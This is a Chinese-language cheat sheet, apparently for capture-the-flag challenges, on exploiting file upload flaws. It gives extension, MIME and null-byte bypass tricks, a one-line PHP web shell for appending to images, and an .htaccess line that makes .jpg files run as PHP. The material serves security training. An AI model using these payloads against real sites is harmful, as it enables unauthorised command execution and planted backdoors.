## **C. File Upload Arbitrary File Upload**

### 1. 类型

* 任意文件上传
* 文件扩展名绕过（双扩展名、大小写、特殊字符）
* MIME 类型绕过
* 文件内容绕过（图片马）

### 2. 解题输出思路

1. 识别文件上传点和限制
2. 尝试上传非预期文件（如 `.php`, `.phtml`）
3. 尝试绕过扩展名检查（双扩展名、编码）
4. 尝试绕过 MIME 类型检查
5. 上传 WebShell 或其他恶意文件
6. 定位上传文件路径并执行
7. 读取 flag

### 3. 关注点

* 文件类型检查机制（黑名单/白名单）
* 文件内容检查（如是否为图片）
* 上传路径是否可访问
* 文件名处理（随机化、过滤）
* 是否有文件解析漏洞（如 PHP 解析 .jpg）

### 4. 通用

#### 通用步骤

* 上传 `.txt` 文件测试
* 上传 `.php` 文件测试
* 查看上传后的文件路径

### 5. 方法论

* 绕过客户端和服务端的双重校验
* 利用服务器解析漏洞
* 流程：上传点识别 → 绕过检查 → 文件执行 → 命令执行 → flag 读取

### 6. 启发性问题

* 文件类型检查是黑名单还是白名单？
* 是否检查文件内容？
* 上传目录是否可执行 PHP？
* 文件名是否被随机化或过滤？

### 7. 绕过手法

* 双扩展名：`.php.jpg`
* 大小写绕过：`.pHp`
* 空字节截断：`shell.php%00.jpg`
* MIME 类型伪造
* 文件内容伪装（图片马）
* 特殊字符：`.php.`, `.php::$DATA`

### 8. 典型 payload

#### 双扩展名上传：

```
shell.php.jpg
```

#### 图片马内容（在图片文件末尾追加）：

```php
<?php system($_GET['cmd']); ?>
```

#### 上传 `.htaccess` 绕过（如果允许）：

```
AddType application/x-httpd-php .jpg
```

